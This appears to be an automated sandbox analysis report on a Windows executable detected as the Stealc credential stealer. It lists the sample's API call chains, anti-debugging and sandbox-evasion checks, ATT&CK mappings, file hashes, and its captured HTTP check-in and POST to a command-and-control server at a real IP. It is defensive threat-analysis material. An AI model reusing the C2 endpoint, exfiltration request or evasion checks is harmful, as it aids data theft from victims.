                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00A638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A64910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00A5DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00A5E430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00A5ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00A64570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00A63EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A5F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A5DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00A5BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A51160 GetSystemInfo,ExitProcess,1_2_00A51160
                Source: file.exe, file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm0>
                Source: file.exe, 00000001.00000002.1365721662.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1322360305.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.0000000001473000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware7
                Source: file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13639
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13636
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13658
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13649
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13690
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A545C0 VirtualProtect ?,00000004,00000100,000000001_2_00A545C0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00A69860
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A69750 mov eax, dword ptr fs:[00000030h]1_2_00A69750
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_00A678E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A69600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00A69600
                Source: file.exe, file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: )Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00A67B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A67980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_00A67980
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A67850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00A67850
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A67A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00A67A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 1.2.file.exe.a50000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 1.2.file.exe.a50000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		33
                Virtualization/Sandbox Evasion                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		11
                Disable or Modify Tools                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Process Injection                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                Software Packing                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe39%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/u8file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpEfile.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpUfile.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php3file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37sfile.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpGfile.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1522357
                            Start date and time:2024-09-30 00:29:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 56s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:15
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 82
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.94652558651442
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'864'704 bytes
                            MD5:0079fd2131677b1d9eab7228129b05c6
                            SHA1:b990a78e97be25d3296df08c7fd3c2c2491804cb
                            SHA256:e5d54dbfb6aa3a373538a399c8727551d092d8980fe263cccda5b4b910154a04
                            SHA512:d8d8ebe2e58fdec3ffd61dc00d1495593f7c99d621bc73a3bf016121bc756dc6ce2094b22d242e1f74a7c580907e15f4d38a70ccbea1f611a5a2a0a1e277fa85
                            SSDEEP:49152:u/NJGzIPPKFIXSTHseBtAKmGXMO6HfIryi81qMojb3bScdt:zInKFIi8KmhOCfQ981AjL7
                            TLSH:F585336DAC2EBD36DC8D0DF6DFC34A9F3ABE1993114767B1661576BA0492101FA38C80
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xaa1000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F60F0F7170Ah
                            rsqrtps xmm3, dqword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007F60F0F73705h
                            add byte ptr [0000000Ah], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], cl
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], cl
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ebx], cl
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x22800427e8447da43253ef3ede1ed6d77617cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2a00000x2007cf1fdc520cc37f99f078bcae65bb2d9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            aabwzlbm0x4fe0000x1a20000x1a1200291da12c71ba6c53bb3cb72aa3eb02bbFalse0.9949325273449205data7.952978260214906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            cxkmbtsd0x6a00000x10000x400f24abbc44fbe0a7aa09d38c8710d4360False0.8076171875data6.257562000450293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6a10000x30000x2200bf7ad851b356722ed8fbec9821ad12e0False0.07238051470588236DOS executable (COM)0.9336206550634348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-09-30T00:30:12.065256+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749700185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 30, 2024 00:30:10.017556906 CEST4970080192.168.2.7185.215.113.37
                            Sep 30, 2024 00:30:10.022598982 CEST8049700185.215.113.37192.168.2.7
                            Sep 30, 2024 00:30:10.023593903 CEST4970080192.168.2.7185.215.113.37
                            Sep 30, 2024 00:30:10.024296045 CEST4970080192.168.2.7185.215.113.37
                            Sep 30, 2024 00:30:10.029081106 CEST8049700185.215.113.37192.168.2.7
                            Sep 30, 2024 00:30:10.742758036 CEST8049700185.215.113.37192.168.2.7
                            Sep 30, 2024 00:30:10.742825031 CEST4970080192.168.2.7185.215.113.37
                            Sep 30, 2024 00:30:11.829349995 CEST4970080192.168.2.7185.215.113.37
                            Sep 30, 2024 00:30:11.835004091 CEST8049700185.215.113.37192.168.2.7
                            Sep 30, 2024 00:30:12.065160990 CEST8049700185.215.113.37192.168.2.7
                            Sep 30, 2024 00:30:12.065256119 CEST4970080192.168.2.7185.215.113.37
                            Sep 30, 2024 00:30:16.455998898 CEST4970080192.168.2.7185.215.113.37

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749700185.215.113.37805740C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Sep 30, 2024 00:30:10.024296045 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Sep 30, 2024 00:30:10.742758036 CEST203INHTTP/1.1 200 OK
                            Date: Sun, 29 Sep 2024 22:30:10 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Sep 30, 2024 00:30:11.829349995 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCA
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
